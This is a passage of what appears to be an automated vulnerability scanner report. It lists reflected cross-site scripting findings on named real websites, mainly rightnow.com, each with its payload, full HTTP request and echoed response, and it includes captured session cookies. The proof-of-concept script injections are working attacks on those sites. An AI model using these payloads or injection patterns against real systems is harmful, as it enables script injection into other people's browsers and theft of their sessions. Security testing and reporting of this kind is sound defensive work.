Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13
X-Pingback: http://www.opinionlab.com/content/xmlrpc.php
Set-Cookie: OLRURI=http%3A%2F%2Fwww.iab.net%2Fsite_map%7Chttp%3A%2F%2Fwww.iab.net%2Fsite_map; expires=Fri, 31-Aug-2012 16:15:27 GMT; path=/
Set-Cookie: OLRTYPE=Brand%7CBrand; expires=Fri, 31-Aug-2012 16:15:27 GMT; path=/
Set-Cookie: OLTRMS=NONE%7CNONE; expires=Fri, 31-Aug-2012 16:15:27 GMT; path=/
Set-Cookie: OLCIDS=%7C; expires=Fri, 31-Aug-2012 16:15:27 GMT; path=/
X-Powered-By: ASP.NET
ETags: ""
Date: Thu, 01 Sep 2011 16:15:27 GMT
Content-Length: 28123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName=oPageName
s.server=ol_siteURL
s.channel="/content/?61856</script><script>alert(1)</script>d1297f41988=1" // Section name
s.campaign=""
s.prop1=oPageName // page name
s.prop2="5767.4e5faf709594e1.24524238" // WEBID
/* Custom variables for custom reporting */
s.eVar1=oPageName
s.eVar2="5767.4e5f
...[SNIP]...

4.221. http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rbisaleschallenge.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0eeb"><script>alert(1)</script>02fed4cc8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0eeb"><script>alert(1)</script>02fed4cc8e9=1 HTTP/1.1
Host: www.rbisaleschallenge.com
Proxy-Connection: keep-alive
Referer: http://wiki.coldbox.org/wiki/UsingColdBox.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>www.rbisaleschallenge.com</title>

</head>
<frameset rows="100%,*" bor
...[SNIP]...
<frame src="http://rbisaleschallenge.wpunj.edu/?d0eeb"><script>alert(1)</script>02fed4cc8e9=1" frameborder="0" />
...[SNIP]...

4.222. http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rbisaleschallenge.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a69"><script>alert(1)</script>afb96244eb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1 HTTP/1.1
Host: www.rbisaleschallenge.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>www.rbisaleschallenge.com</title>

</head>
<frameset rows="100%,*" bor
...[SNIP]...
<frame src="http://rbisaleschallenge.wpunj.edu/favicon.ico?53a69"><script>alert(1)</script>afb96244eb5=1" frameborder="0" />
...[SNIP]...

4.223. http://www.rightnow.com/company-contact.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/company-contact.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d34'-alert(1)-'e12bb55d977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /company-contact.php73d34'-alert(1)-'e12bb55d977 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38696

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
y.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/company-contact.php73d34'-alert(1)-'e12bb55d977',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.224. http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/company-contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f9d'-alert(1)-'531b674974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /company-contact.php?f6f9d'-alert(1)-'531b674974=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:15:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 44362

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/company-contact.php?f6f9d'-alert(1)-'531b674974=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.225. http://www.rightnow.com/cx.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/cx.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20623'-alert(1)-'468b397d330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cx.html20623'-alert(1)-'468b397d330 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38684

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/cx.html20623'-alert(1)-'468b397d330',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.226. http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/cx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa271'-alert(1)-'eab22d1b281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /cx.html?fa271'-alert(1)-'eab22d1b281=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:15:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 39664

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/cx.php?fa271'-alert(1)-'eab22d1b281=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.227. http://www.rightnow.com/cx.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/cx.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58a7'-alert(1)-'e244cb60cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cx.phpd58a7'-alert(1)-'e244cb60cfb HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38683

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/cx.phpd58a7'-alert(1)-'e244cb60cfb',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.228. http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/cx.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dfa'-alert(1)-'b945d6d6f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cx.php?13dfa'-alert(1)-'b945d6d6f74=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://omniture-hbx.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist/session/L3RpbWUvMTMxNDgxNDQ1NC9zaWQvN3l4LVdXQ2s=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:15:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 39664

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/cx.php?13dfa'-alert(1)-'b945d6d6f74=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.229. http://www.rightnow.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e25'-alert(1)-'79fc9cf9e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icoc7e25'-alert(1)-'79fc9cf9e4a HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.rightnow.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38609

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/favicon.icoc7e25'-alert(1)-'79fc9cf9e4a',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.230. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/floatbox/graphics/loader_iframe_white.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6679'-alert(1)-'58fa45e0a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /floatboxb6679'-alert(1)-'58fa45e0a9a/graphics/loader_iframe_white.html HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss5ff99%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E6ad8c47ae16
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38640

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/floatboxb6679'-alert(1)-'58fa45e0a9a/graphics/loader_iframe_white.html',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup(
...[SNIP]...

4.231. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/floatbox/graphics/loader_iframe_white.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfe4'-alert(1)-'603995fd0d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /floatbox/graphics2cfe4'-alert(1)-'603995fd0d0/loader_iframe_white.html HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss5ff99%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E6ad8c47ae16
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38640

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/floatbox/graphics2cfe4'-alert(1)-'603995fd0d0/loader_iframe_white.html',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: f
...[SNIP]...

4.232. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/floatbox/graphics/loader_iframe_white.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2c8'-alert(1)-'e0337fe94ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /floatbox/graphics/loader_iframe_white.htmlbe2c8'-alert(1)-'e0337fe94ff HTTP/1.1
Host: www.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss5ff99%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E6ad8c47ae16
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; PHPSESSID=5acd71n9cl008n5ut73i1l9fs0; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 19:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38640

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
now.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/floatbox/graphics/loader_iframe_white.htmlbe2c8'-alert(1)-'e0337fe94ff',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.233. http://www.rightnow.com/helvetica-bold-webfont.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica-bold-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdea'-alert(1)-'da2dd0d86eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica-bold-webfont.woffebdea'-alert(1)-'da2dd0d86eb HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:15:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38704

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
ttp://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/helvetica-bold-webfont.woffebdea'-alert(1)-'da2dd0d86eb',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.234. http://www.rightnow.com/helvetica-light-webfont.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/helvetica-light-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e759a'-alert(1)-'5ea9d5a4cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /helvetica-light-webfont.woffe759a'-alert(1)-'5ea9d5a4cb7 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
